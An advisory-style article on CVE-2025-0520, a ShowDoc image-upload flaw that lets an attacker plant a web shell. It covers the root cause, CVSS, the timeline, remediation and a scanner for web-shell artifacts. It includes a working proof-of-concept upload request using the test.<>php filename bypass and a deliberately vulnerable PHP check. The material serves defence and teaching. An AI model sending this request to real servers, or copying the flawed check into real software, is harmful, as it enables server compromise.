ShowDoc File Upload RCE (CVE-2025-0520) Sees First In-the-Wild Exploitation After 5 Years
VulnCheck’s Canaries (a honeypot-based service for detecting real-world exploitation) confirmed the first in-the-wild exploitation of CVE-2025-0520 against ShowDoc on April 11, 2026.
The attack exploits insufficient file-extension validation on an image-upload endpoint to plant a web shell (a script that lets an attacker run arbitrary OS commands over HTTP). It is the first real-world attack observed, roughly five years after the vulnerability was originally discovered.
What Is ShowDoc?
ShowDoc is a Chinese-origin open-source document management and sharing tool used for creating and publishing API specifications and project documentation.
With over 20,000 GitHub stars, it is primarily adopted by Chinese IT companies and development teams.
It is written in PHP and can also be installed via Composer.
Over 2,000 instances are estimated to be publicly accessible on the internet, the vast majority located in China.
Technical Details
| Field | Value |
|---|---|
| CVE Identifier | CVE-2025-0520 (also known as CNVD-2020-26585) |
| CVSS v4.0 Score | 9.4 (Critical) |
| CVSS v4.0 Vector | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L |
| CWE | CWE-434 (Unrestricted Upload of File with Dangerous Type) |
| Affected Versions | ShowDoc before 2.8.7 |
The root cause lies in the uploadImg method of the PageController class.
This endpoint backs the image-upload function of the Markdown editor (the editormd-image-file form field), but its file-extension check can be bypassed, so it ends up accepting any file type, PHP included.
Attack Flow
```mermaid
flowchart TD
    A[Attacker] -->|POST request| B["/index.php?s=/home/page/uploadImg"]
    B -->|Bypass extension check| C["filename='test.<>php'"]
    C -->|Server accepts| D[PHP file saved to web root]
    D -->|GET request| E[Arbitrary PHP code execution]
    E --> F[Web shell established]
    F --> G[Full server compromise]
```
The attacker defeats the server-side extension check by inserting angle brackets into the filename, for example test.<>php: the check does not see a plain php extension, yet the file is written with a .php name. Because the upload lands in a web-accessible directory, executing it is just a matter of requesting its URL.
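The following is an added example, not ShowDoc's code, reconstructing the class of bug that a test.<>php bypass exploits: an extension check that runs on the raw client-supplied name, followed by a clean-up step (here PHP's strip_tags) that turns the name into test.php before the file is stored. The function names, the blocklist and allowlist, and the sample inputs are assumptions made for the example; the hardened version beside it shows the order a practitioner should use instead.

```php
<?php
declare(strict_types=1);

/*
 * Added example, not ShowDoc's code. It reconstructs the class of bug the
 * test.<>php bypass exploits: an extension check that runs on the raw
 * client-supplied name and a clean-up (strip_tags) that runs afterwards.
 * Function names, the blocklist/allowlist and the sample names are assumptions.
 */

/** Vulnerable pattern: check first, sanitise second. */
function vulnerable_save_name(string $clientName): ?string
{
    $blocked = ['php', 'php5', 'phtml', 'phar'];
    // pathinfo() sees "<>php", which is not on the blocklist ...
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (in_array($ext, $blocked, true)) {
        return null;
    }
    // ... and strip_tags() then removes "<>", so the stored name ends in .php.
    return strip_tags($clientName);
}

/** Hardened pattern: normalise, allowlist, verify the bytes, mint a server-side name. */
function hardened_save_name(string $clientName, string $tmpPath): ?string
{
    $allowed = [
        'jpg'  => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'png'  => 'image/png',
        'gif'  => 'image/gif',
    ];
    // 1. Normalise exactly as the storage layer will, before looking at anything.
    $clean = strip_tags(basename($clientName));
    $ext   = strtolower(pathinfo($clean, PATHINFO_EXTENSION));
    // 2. Allowlist on the normalised extension (test.<>php normalises to "php", which is not allowed).
    if (!isset($allowed[$ext])) {
        return null;
    }
    // 3. Trust the bytes, not the name: a PHP payload named x.png is not image/png.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== $allowed[$ext]) {
        return null;
    }
    // 4. Never reuse the client name; the extension is ours and the stem is random.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Demonstration with constructed inputs (run: php upload_check.php).
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "<?=phpinfo();?>");          // the Vulhub payload, as bytes

var_dump(vulnerable_save_name('test.<>php'));       // the bypass slips through
var_dump(hardened_save_name('test.<>php', $tmp));   // rejected by the allowlist
var_dump(hardened_save_name('shell.png', $tmp));    // rejected by the MIME check
unlink($tmp);
```

The point of the hardened version is ordering and source of truth: validate the name only after every transformation the storage path will apply, allowlist rather than blocklist, inspect the content with finfo rather than trusting the client's Content-Type, and discard the client-supplied name entirely. Storing uploads outside the document root, or in a directory the web server never hands to PHP, is the complementary defence covered under Remediation.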
PoC Request Example
The CNVD-2020-26585 demo environment published by VulHub (an educational repository of vulnerable environments) demonstrates the attack with the following request (blank lines separate headers from bodies, as the multipart format requires).

```http
POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: target:8080
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain

<?=phpinfo();?>
------Boundary--
```

The endpoint answers in the editor.md upload format, so the JSON response itself tells the attacker where the file was stored. In actual attacks the payload is a web shell rather than a phpinfo() probe, giving full control of the server.
The “PR:L” Discrepancy
NVD's CVSS v4.0 vector scores the vulnerability PR:L (Privileges Required: Low), whereas VulnCheck's report and the GitHub advisory describe it as unauthenticated.
Depending on ShowDoc version and configuration, the uploadImg endpoint can be reached without logging in, and the attack observed against the honeypot also appears to have been unauthenticated.
The vector is therefore ambiguous on this point; for practical purposes the exploitation bar should be treated as "no authentication required", which matches both the advisory wording and the observed attack.
Timeline from Discovery to Exploitation
| Date | Event |
|---|---|
| May 2020 | CNVD (China National Vulnerability Database) registers the issue as CNVD-2020-26585 |
| October 2020 | Patch released in ShowDoc 2.8.7 |
| April 29, 2025 | Formally assigned as CVE-2025-0520 (delayed assignment from CNVD to CVE) |
| April 11, 2026 | VulnCheck Canaries confirms first in-the-wild exploitation at a US-based honeypot |
| April 14, 2026 | The Hacker News reports on the exploitation |
There is an approximately five-year lag between vulnerability discovery and CVE assignment.
This reflects the still-incomplete information sharing between CNVD (China’s vulnerability database) and the CVE system.
The asymmetry between CNVD and CVE is covered in detail in SentinelOne’s LABScon analysis.
Current Exposure
ShowDoc 3.8.1 is the latest version, but a significant number of the 2,000+ internet-facing instances remain unpatched.
While the attack observed by Canaries targeted a US-based honeypot, ShowDoc’s primary user base is concentrated in China, and actual attack targets likely follow a similar distribution.
VulnCheck KEV (Known Exploited Vulnerabilities) has already added an entry, with Canaries-derived exploitation evidence linked to it.
Since VulnCheck integrated Canary Intelligence into KEV entries in October 2025, actual attack observations from honeypots now serve as supporting evidence for VulnCheck KEV additions.
Remediation
The patch was released in October 2020, over five years ago, so upgrading to version 2.8.7 or later (latest is 3.8.1) is the only fundamental fix for ShowDoc operators.
For instances exposed to the internet, additional measures are also necessary.
| Measure | Details |
|---|---|
| Restrict access to the upload endpoint | Allow POST requests to /index.php?s=/home/page/uploadImg only from trusted networks, via WAF or reverse proxy. Match on the route (home/page/uploadImg) rather than on one exact query string, and treat the rule as a stopgap: encoded or alternative URL forms can slip past a string match, so it does not replace the patch |
| Disable PHP execution in the upload directory | Apache with mod_php: php_flag engine off (or RemoveHandler for .php) in a Directory block or .htaccess for the upload directory. Nginx: make sure no location under the upload directory hands requests to PHP-FPM |
| Check for web shell artifacts | Look in the upload directory for files with .php, .phtml or .phar extensions (including double extensions such as .php.png) and for files whose content starts with a PHP open tag. Correlate with web server access logs: a POST to uploadImg followed by requests to the stored file is the exploitation pattern |
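The first two measures together, as an added Nginx example. This is not ShowDoc's own deployment configuration; the document root, the upload path (/Public/Uploads/), the internal CIDR and the FastCGI socket are assumptions to be adapted to the deployment. Upgrading remains the actual fix.

```nginx
# Added example, not ShowDoc's deployment configuration. Paths, the internal
# CIDR and the PHP-FPM socket are assumptions; adapt them to the deployment.

# 1 = request came from outside the assumed internal range.
geo $from_outside {
    default      1;
    10.0.0.0/8   0;
}

# 1 = the uploadImg route reached from outside. ShowDoc routes on the "s"
# query parameter, so match on $request_uri, which includes the query string
# (and also catches a path-info style /index.php/home/page/uploadImg).
map "$request_uri:$from_outside" $deny_upload {
    default                        0;
    "~*home/page/uploadimg.*:1$"   1;
}

server {
    listen 80;
    root  /var/www/showdoc;   # assumed document root
    index index.php;

    # Refuse the upload endpoint for external clients before it reaches PHP.
    location = /index.php {
        if ($deny_upload) { return 403; }
        include        fastcgi_params;
        fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass   unix:/run/php/php-fpm.sock;
    }

    # Serve the upload directory as static files only. "^~" takes precedence
    # over the regex location below, so nothing under it is ever handed to
    # PHP-FPM; the nested location refuses script-like names outright rather
    # than serving their source.
    location ^~ /Public/Uploads/ {
        add_header X-Content-Type-Options nosniff;
        location ~* \.(php\d?|phtml|phar)(\.|$) { return 403; }
    }

    location ~ \.php$ {
        include        fastcgi_params;
        fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass   unix:/run/php/php-fpm.sock;
    }
}
```

The map on $request_uri is a string match and can be evaded by encoding the route, which is why the access restriction is a stopgap; the ^~ upload location is the more robust of the two, because it removes the execution step regardless of what name the file was stored under. Test both with a harmless request before relying on them: a POST to the route from an external address should get 403, and a request for an existing .php name under /Public/Uploads/ should be refused rather than executed.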
The Magento PolyShell vulnerability (unauthenticated RCE through the Magento REST API) similarly relied on polyglot files to get past upload extension validation.
File-upload handlers are a recurring target: they are easy to write, and the validation that goes with them is often lax.
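For the artifact check in the remediation table above, the following is an added PHP CLI example (not ShowDoc code) that walks an upload directory and flags files by three independent indicators: an executable or double extension, a PHP open tag in the first 4 KiB of content, and a MIME type that is not an image. The upload root, indicator patterns and the constructed sample tree are assumptions.

```php
<?php
declare(strict_types=1);

/*
 * Added example for the "check for web shell artifacts" step. Not ShowDoc
 * code; the upload root, the indicator patterns and the constructed sample
 * files are assumptions. Run it against a copy of the upload directory if
 * evidence (timestamps, ownership) has to be preserved.
 */

/** Return [path => [reason, ...]] for every file that does not belong in an image-upload tree. */
function scan_uploads(string $root): array
{
    $findings = [];
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    // Executable extensions, including double extensions such as x.php.png.
    $execExt  = '/\.(php\d?|phtml|phar)(\.|$)/i';
    $iter     = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path    = $file->getPathname();
        $reasons = [];
        if (preg_match($execExt, $file->getFilename())) {
            $reasons[] = 'executable extension';
        }
        // Names lie; look at the first 4 KiB of content as well.
        $head = (string) file_get_contents($path, false, null, 0, 4096);
        if (preg_match('/<\?(php|=)/i', $head)) {
            $reasons[] = 'PHP open tag in content';
        }
        $mime = $finfo->file($path) ?: 'unknown';
        if (strpos($mime, 'image/') !== 0) {
            $reasons[] = "MIME is $mime, not image/*";
        }
        if ($reasons) {
            $findings[$path] = $reasons;
        }
    }
    ksort($findings);
    return $findings;
}

// Demonstration on a constructed tree (run: php scan_uploads.php).
$root = sys_get_temp_dir() . '/uploads_' . bin2hex(random_bytes(4));
mkdir("$root/2026-04-11", 0700, true);
// A genuine 1x1 PNG, base64-encoded here so the example is self-contained.
file_put_contents("$root/2026-04-11/ok.png", base64_decode(
    'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='
));
file_put_contents("$root/2026-04-11/a1b2.php", "<?=phpinfo();?>");    // Vulhub-style payload
file_put_contents("$root/2026-04-11/c3d4.png", "<?php echo 1; ?>");   // script disguised as an image

foreach (scan_uploads($root) as $path => $reasons) {
    printf("%s: %s\n", $path, implode(', ', $reasons));
}
```

A hit on any single indicator deserves a look; a file that trips two or three is almost certainly not an upload from the Markdown editor. Pair the listing with the file's mtime and with the access log entries for POSTs to uploadImg around that time, since the response to the upload tells the attacker the stored path and the follow-up GET to that path is usually logged too.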
Reading CVSS v4.0
This CVE is scored using CVSS v4.0, which differs from the previous v3.1 in its evaluation axes. Here is a breakdown of the key metrics.
| Metric | Value | Meaning |
|---|---|---|
| AV (Attack Vector) | N (Network) | Remotely exploitable over the internet |
| AC (Attack Complexity) | L (Low) | No attacker-side effort needed to defeat protections (no race, no address-space guessing) |
| AT (Attack Requirements) | N (None) | No special prerequisites in the target environment |
| PR (Privileges Required) | L (Low) | A low-privileged account is assumed; compare PR:N (None), which is what the "unauthenticated" descriptions above would imply |
| UI (User Interaction) | N (None) | No victim interaction required |
| VC/VI (Vulnerable System Confidentiality/Integrity) | H/H | Full read/write access to data on the vulnerable server |
| VA (Vulnerable System Availability) | L (Low) | Limited impact on the server's availability |
| SC/SI (Subsequent System Confidentiality/Integrity) | H/H | Other systems reachable from the server are at high risk once a web shell is in place |
| SA (Subsequent System Availability) | L (Low) | Limited availability impact on those other systems |
The high subsequent-system ratings (SC/SI) reflect the lateral movement into internal networks that typically follows web shell installation.
Related Articles
- CVSS 10.0 RCE in Flowise CustomMCP Node Exposes 12,000+ Instances - Another open-source tool RCE confirmed exploited by VulnCheck. A pattern where patches exist but massive numbers of instances remain exposed
- CISA Adds 4 Actively Exploited Vulnerabilities to KEV Catalog - A case where a 2008 vulnerability was added to KEV in 2026. Old CVEs being used in real attacks years later is not unique to ShowDoc